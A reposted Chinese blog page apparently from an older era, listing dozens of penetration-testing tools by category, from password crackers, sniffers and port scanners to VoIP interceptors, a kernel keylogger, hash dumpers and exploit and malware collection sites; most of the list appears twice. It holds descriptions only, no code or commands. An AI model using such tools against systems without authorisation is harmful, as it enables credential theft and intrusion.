本文汇总了大量网络安全工具,包括包整形工具、密码破解工具、嗅探器、端口扫描器、安全扫描器等,并覆盖了从网络包处理到登录破解、信息收集等多个方面。
Packet Shaper:
Nemesis : a command line packet shaper
Packit : The Packet Toolkit - A network packet shaper.
Hping by Antirez: a command line TCP/IP packet shaper
Sing : stands for ‘Send ICMP Nasty Garbage’; sends fully customizeable ICMP packets
Scapy : a new python-based packet generator
Password Cracker/Login Hacker:
John the Ripper : a well-known password cracker for Windows and *nix Systems
Djohn : a distributed password cracker based on “ John the Ripper ”
Cain & Abel : an advanced password recovery tool for windows systems. It sniffs the network packets an cracks authentication brute-force or with dictionary attacks.
Project RainbowCrack : Advanced instant NT password cracker
Rainbowtables : The shmoo group provides pre-generated rainbow tables for bittorrent download. The tables are generated with RainbowCrack (see above).
Windows NT password recovery tool by Peter Nordahl
THC-Dialup Login Hacker by THC. It tries to guess username and password against the modem carrier. As far as I know the only available dialup password guesser for *NIX.
Hydra by THC: a multi-protocol login hacker. Hydra is also integrated with Nessus .
Medusa : parallel network login auditor
THC imap bruter : a very fast imap password brute forcer
x25bru : a login/password bruteforcer for x25 pad
Crowbar : a generic web brute force tool (Windows only; requires .NET Framework)
MDCrack-NG : a very fast MD4/MD5/NTLMv1 hash cracker; works optionally with precomputed hash tables
Advanced Sniffers:
Wireshark (formerly known as Ethereal): an open source network protocol analyzer
Dsniff by Dug Song: a combination of very useful sniffer and man-in-the-middle attack tools
Ettercap : a multipurpose sniffer/interceptor/logger for switched LAN environments
aimsniffer : monitors AOL instant messager communication on the network
4G8 : a tool ,similar to ettercap, to capture network traffic in switched environments
cdpsniffer : Cisco discovery protocol (CDP) decoding sniffer
Port Scanner / Information Gathering:
nmap : the currently most well-known port scanner. Since version 3.45 it supports version scans . Have a look at PBNJ for diffing different nmap scans.
ISECOM released their nmap wrapper NWRAP , which shows all known protocols for the discovered ports form the Open Protocol Resource Database
Nmap::Scanner : Perl output parser for nmap
Amap by THC: An advanced portscanner which determines the application behind a network port by its application handshake. Thus it detects well-known applications on non-standard ports or unknown applications on well-known ports.
vmap by THC: version mapper to determine the version (sic!) of scanned daemons
Unicornscan : a information gathering and correlation engine
DMitry (Deepmagic Information Gathering Tool): a host information gathering tool for *nix systems
Athena : a search engine query tool for passive information gathering
Security Scanner:
Nessus - In version 2 an OpenSource network scanner. Version 3 is only available in binary form and under a proprietary license.
OpenVAS : a fork of Nessus 2.2.5 (formerly known as GNessUs)
Nessj: a java based nessus (and compatibles) client (formerly known as Reason)
Paul Clip from @stake released AUSTIN , a security scanner for Palm OS 3.5+.
Webserver:
Nikto : a web server scanner with anti IDS features. Based on Rain Forest Puppies libwhisker library.
Wikto : a webserver assessment tool (Windows only; requires .NET framework)
WSDigger : a black box web pen testing tool from Foundstone (Windows based)
Metis : a java based information gathering tool for web sites
Fingerprinting:
SinFP : a fingerprinting tool which requires only an open tcp port and sends maximum 3 packets
Winfingerprint : much more than a simple fingerprinting tool.It scans for Windows shares, enumerates usernames, groups, sids and much more.
p0f 2 : Michal Zalewski announced his new release of p0f 2, a passive OS fingerprinting tool. p0f 2 is a completely rewrite of the old p0f code.
xprobe2 : a remote active operating system fingerprinting tool from Ofir Arkin and the xprobe2 team
Cron-OS : an active OS fingerprinting tool based on TCP timeout behavior. This project was formerly known as “RING” and is now published as a nmap addon.
Proxy Server:
Burp proxy : an interactive HTTP/S proxy server for attacking and debugging web-enabled applications
Screen-scraper : a http/https-proxy server with a scripting engine for data manipulation and searching
Paros : a man-in-the-middle proxy and application vulnerability scanner
WebScarab : a framework for analyzing web applications. One of it’s basic functionality is the usage as intercepting proxy.
War Dialers:
IWar : a classic war dialer, now also with VOIP (IAX2) support. One of a few wardialers for *nix operation systems, and the only with VOIP functionality (to my knowledge)
THC-Scan: a war dialer for DOS, Windows and DOS emulators
Malware / Exploit Collections:
packetstormsecurity.org : Huge collections of tools and exploits
ElseNot Project : The project tries to publish an exploit for each MS Security Bulltin. A script kiddie dream come true.
Offensive Computing : Another malware collection site
Securityforest : try the ExploitTree to get a collection of exploit code; have a look at the ToolTree for a huge list of pentest stuff
Databases / SQL:
sqlninja : a tool to exploit sql injection vulnerabilities in web applications with MS SQL Servers (alpha stage)
CIS Oracle Database Scoring Tool : scans Oracle 8i for compliance with the CIS Oracle Database Benchmark
SQLRecon : an active and passive scanner for MSSQL server. Works on Windows 2000, XP and 2003.
absinthe : a gui-based tool that automates the process of downloading the schema & contents of a database that is vulnerable to Blind SQL Injection (see here and here ).
SQL Power Injector : a GUI based SQL injector for web pages (Windows, .Net Framework 1.1 required, Internet Explorer 5.0+ required)
Voice over IP (VOIP):
vomit (voice over misconfigured internet telephones): converts Cisco IP phone conversations into wave files
SiVuS : a VOIP vulnerability scanner - SIP protocol (beta, Windows only)
Cain & Abel : mostly a password cracker, can also record VOIP conversations (Windows only)
sipsak (SIP swis army knife): a SIP packet generator
SIPp : a SIP test tool and packet generator
Nastysip : a SIP bogus message generator
voipong : dumps G711 encoded VOIP communications to wave files. Supports: SIP, H323, Cisco Skinny Client Protocol, RTP and RTCP
Perl based tools by Thomas Skora: sip-scan, sip-kill, sip-redirectrtp, rtpproxy and ipq_rules
rtptools : a toolset for rtp recording and playing
Networkbased Tools:
yersinia : a network tool designed to take advantage of some weakeness in different network protocols (STP, CDP, DTP, DHCP, HSRP, 802.1q, VTP)
Netsed : alters content of network packets while forwarding the packets
ip6sic : a IPv6 stack integrity tester
VPN:
ike-scan : an IPSec enumeration and fingerprinting tool
ikeprobe : ike scanning tool
ipsectrace : a tool for profiling ipsec traffic in a dump file. Initial alpha release
VPNMonitor : a Java application to observer network traffic. It graphically represents network connections and highlights all VPN connections. Nice for demonstrations, if somewhat of limited use in a real pen test.
IKECrack :an IKE/IPSec cracker for pre-shared keys (in aggressive mode authentication [RFC2409])
DNSA : DNS Auditing tool by Pierre Betouin
Hunt : a session hijacking tool with curses GUI
SMAC : a Windows MAC Address Modifying Utility. Supports Windows 2000 and XP.
The WebGoat Project : a web application written in Java with intentional vulnerabilities. Supports an interactive learning environment with individual lessons.
TSCrack : a Windows Terminal Server brute forcer
Ollie Whitehouse from @stake released some new cellular phone based pentesting tools for scanning ( NetScan , MobilePenTester ). All tools require a Sony Ericsson P800 mobile phone. Unfortunately, @stake seems no longer to support much of their free security tools. So, use instead the alternativ download links above.
THC-FuzzyFingerprint : generates fuzzy fingerprints that look almost nearly equal to a given fingerprint/hash-sum. Very useful for MITM attacks.
BeatLM , a password finder for LM/NTLM hashes. Currently, there is no support for NTLM2 hashes. In order to get the hashes from network traffic, try ScoopLM .
THC vlogger : a linux kernel based keylogger
The Metasploit Framework : an “advanced open-source platform for developing, testing, and using exploit code”.
ATK (Attack Tool Kit): a comination of security scanner and exploit framework (Windows only)
Pirana : an exploitation framework to test the security of email content filters. See also the whitepaper
PassLoc : a tool which provides the means to locate keys within a buffer. Based on the article “ Playing hide and seek with stored keys ” by Adi Shamir.
Dl-Hell : identifies an executables dynamic link library (DLL) files
DHCPing : a security tool for testing dhcp security
ldapenum : a perl script for enumeration against ldap servers.
Checkpwd : a dictionary based password checker for oracle databases
NirCmd from NirSoft : a windows command line tool to manipulate the registry, initiate a dialup connection and much more
Windows Permission Identifier : a tools for auditing user permissions on a windows system
MSNPawn : a toolset for footprinting, profiling and assesment via the MSN Search. Windows-only, .NET required
snmpcheck :a tool to gather information via snmp. Works on Linux, *BSD and Windows systems.
pwdump6 : extract NTLM and LanMan hashes from Windows targets
Nemesis : a command line packet shaper
Packit : The Packet Toolkit - A network packet shaper.
Hping by Antirez: a command line TCP/IP packet shaper
Sing : stands for ‘Send ICMP Nasty Garbage’; sends fully customizeable ICMP packets
Scapy : a new python-based packet generator
Password Cracker/Login Hacker:
John the Ripper : a well-known password cracker for Windows and *nix Systems
Djohn : a distributed password cracker based on “ John the Ripper ”
Cain & Abel : an advanced password recovery tool for windows systems. It sniffs the network packets an cracks authentication brute-force or with dictionary attacks.
Project RainbowCrack : Advanced instant NT password cracker
Rainbowtables : The shmoo group provides pre-generated rainbow tables for bittorrent download. The tables are generated with RainbowCrack (see above).
Windows NT password recovery tool by Peter Nordahl
THC-Dialup Login Hacker by THC. It tries to guess username and password against the modem carrier. As far as I know the only available dialup password guesser for *NIX.
Hydra by THC: a multi-protocol login hacker. Hydra is also integrated with Nessus .
Medusa : parallel network login auditor
THC imap bruter : a very fast imap password brute forcer
x25bru : a login/password bruteforcer for x25 pad
Crowbar : a generic web brute force tool (Windows only; requires .NET Framework)
MDCrack-NG : a very fast MD4/MD5/NTLMv1 hash cracker; works optionally with precomputed hash tables
Advanced Sniffers:
Wireshark (formerly known as Ethereal): an open source network protocol analyzer
Dsniff by Dug Song: a combination of very useful sniffer and man-in-the-middle attack tools
Ettercap : a multipurpose sniffer/interceptor/logger for switched LAN environments
aimsniffer : monitors AOL instant messager communication on the network
4G8 : a tool ,similar to ettercap, to capture network traffic in switched environments
cdpsniffer : Cisco discovery protocol (CDP) decoding sniffer
Port Scanner / Information Gathering:
nmap : the currently most well-known port scanner. Since version 3.45 it supports version scans . Have a look at PBNJ for diffing different nmap scans.
ISECOM released their nmap wrapper NWRAP , which shows all known protocols for the discovered ports form the Open Protocol Resource Database
Nmap::Scanner : Perl output parser for nmap
Amap by THC: An advanced portscanner which determines the application behind a network port by its application handshake. Thus it detects well-known applications on non-standard ports or unknown applications on well-known ports.
vmap by THC: version mapper to determine the version (sic!) of scanned daemons
Unicornscan : a information gathering and correlation engine
DMitry (Deepmagic Information Gathering Tool): a host information gathering tool for *nix systems
Athena : a search engine query tool for passive information gathering
Security Scanner:
Nessus - In version 2 an OpenSource network scanner. Version 3 is only available in binary form and under a proprietary license.
OpenVAS : a fork of Nessus 2.2.5 (formerly known as GNessUs)
Nessj: a java based nessus (and compatibles) client (formerly known as Reason)
Paul Clip from @stake released AUSTIN , a security scanner for Palm OS 3.5+.
Webserver:
Nikto : a web server scanner with anti IDS features. Based on Rain Forest Puppies libwhisker library.
Wikto : a webserver assessment tool (Windows only; requires .NET framework)
WSDigger : a black box web pen testing tool from Foundstone (Windows based)
Metis : a java based information gathering tool for web sites
Fingerprinting:
SinFP : a fingerprinting tool which requires only an open tcp port and sends maximum 3 packets
Winfingerprint : much more than a simple fingerprinting tool.It scans for Windows shares, enumerates usernames, groups, sids and much more.
p0f 2 : Michal Zalewski announced his new release of p0f 2, a passive OS fingerprinting tool. p0f 2 is a completely rewrite of the old p0f code.
xprobe2 : a remote active operating system fingerprinting tool from Ofir Arkin and the xprobe2 team
Cron-OS : an active OS fingerprinting tool based on TCP timeout behavior. This project was formerly known as “RING” and is now published as a nmap addon.
Proxy Server:
Burp proxy : an interactive HTTP/S proxy server for attacking and debugging web-enabled applications
Screen-scraper : a http/https-proxy server with a scripting engine for data manipulation and searching
Paros : a man-in-the-middle proxy and application vulnerability scanner
WebScarab : a framework for analyzing web applications. One of it’s basic functionality is the usage as intercepting proxy.
War Dialers:
IWar : a classic war dialer, now also with VOIP (IAX2) support. One of a few wardialers for *nix operation systems, and the only with VOIP functionality (to my knowledge)
THC-Scan: a war dialer for DOS, Windows and DOS emulators
Malware / Exploit Collections:
packetstormsecurity.org : Huge collections of tools and exploits
ElseNot Project : The project tries to publish an exploit for each MS Security Bulltin. A script kiddie dream come true.
Offensive Computing : Another malware collection site
Securityforest : try the ExploitTree to get a collection of exploit code; have a look at the ToolTree for a huge list of pentest stuff
Databases / SQL:
sqlninja : a tool to exploit sql injection vulnerabilities in web applications with MS SQL Servers (alpha stage)
CIS Oracle Database Scoring Tool : scans Oracle 8i for compliance with the CIS Oracle Database Benchmark
SQLRecon : an active and passive scanner for MSSQL server. Works on Windows 2000, XP and 2003.
absinthe : a gui-based tool that automates the process of downloading the schema & contents of a database that is vulnerable to Blind SQL Injection (see here and here ).
SQL Power Injector : a GUI based SQL injector for web pages (Windows, .Net Framework 1.1 required, Internet Explorer 5.0+ required)
Voice over IP (VOIP):
vomit (voice over misconfigured internet telephones): converts Cisco IP phone conversations into wave files
SiVuS : a VOIP vulnerability scanner - SIP protocol (beta, Windows only)
Cain & Abel : mostly a password cracker, can also record VOIP conversations (Windows only)
sipsak (SIP swis army knife): a SIP packet generator
SIPp : a SIP test tool and packet generator
Nastysip : a SIP bogus message generator
voipong : dumps G711 encoded VOIP communications to wave files. Supports: SIP, H323, Cisco Skinny Client Protocol, RTP and RTCP
Perl based tools by Thomas Skora: sip-scan, sip-kill, sip-redirectrtp, rtpproxy and ipq_rules
rtptools : a toolset for rtp recording and playing
Networkbased Tools:
yersinia : a network tool designed to take advantage of some weakeness in different network protocols (STP, CDP, DTP, DHCP, HSRP, 802.1q, VTP)
Netsed : alters content of network packets while forwarding the packets
ip6sic : a IPv6 stack integrity tester
VPN:
ike-scan : an IPSec enumeration and fingerprinting tool
ikeprobe : ike scanning tool
ipsectrace : a tool for profiling ipsec traffic in a dump file. Initial alpha release
VPNMonitor : a Java application to observer network traffic. It graphically represents network connections and highlights all VPN connections. Nice for demonstrations, if somewhat of limited use in a real pen test.
IKECrack :an IKE/IPSec cracker for pre-shared keys (in aggressive mode authentication [RFC2409])
DNSA : DNS Auditing tool by Pierre Betouin
Hunt : a session hijacking tool with curses GUI
SMAC : a Windows MAC Address Modifying Utility. Supports Windows 2000 and XP.
The WebGoat Project : a web application written in Java with intentional vulnerabilities. Supports an interactive learning environment with individual lessons.
TSCrack : a Windows Terminal Server brute forcer
Ollie Whitehouse from @stake released some new cellular phone based pentesting tools for scanning ( NetScan , MobilePenTester ). All tools require a Sony Ericsson P800 mobile phone. Unfortunately, @stake seems no longer to support much of their free security tools. So, use instead the alternativ download links above.
THC-FuzzyFingerprint : generates fuzzy fingerprints that look almost nearly equal to a given fingerprint/hash-sum. Very useful for MITM attacks.
BeatLM , a password finder for LM/NTLM hashes. Currently, there is no support for NTLM2 hashes. In order to get the hashes from network traffic, try ScoopLM .
THC vlogger : a linux kernel based keylogger
The Metasploit Framework : an “advanced open-source platform for developing, testing, and using exploit code”.
ATK (Attack Tool Kit): a comination of security scanner and exploit framework (Windows only)
Pirana : an exploitation framework to test the security of email content filters. See also the whitepaper
PassLoc : a tool which provides the means to locate keys within a buffer. Based on the article “ Playing hide and seek with stored keys ” by Adi Shamir.
Dl-Hell : identifies an executables dynamic link library (DLL) files
DHCPing : a security tool for testing dhcp security
ldapenum : a perl script for enumeration against ldap servers.
Checkpwd : a dictionary based password checker for oracle databases
NirCmd from NirSoft : a windows command line tool to manipulate the registry, initiate a dialup connection and much more
Windows Permission Identifier : a tools for auditing user permissions on a windows system
MSNPawn : a toolset for footprinting, profiling and assesment via the MSN Search. Windows-only, .NET required
snmpcheck :a tool to gather information via snmp. Works on Linux, *BSD and Windows systems.
pwdump6 : extract NTLM and LanMan hashes from Windows targets
还有无线的一些。在用CENTOS
本文转sinojelly51CTO博客,原文链接:http://blog.51cto.com/pnig0s1992/338176,如需转载请自行联系原作者
扫一扫
7425
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
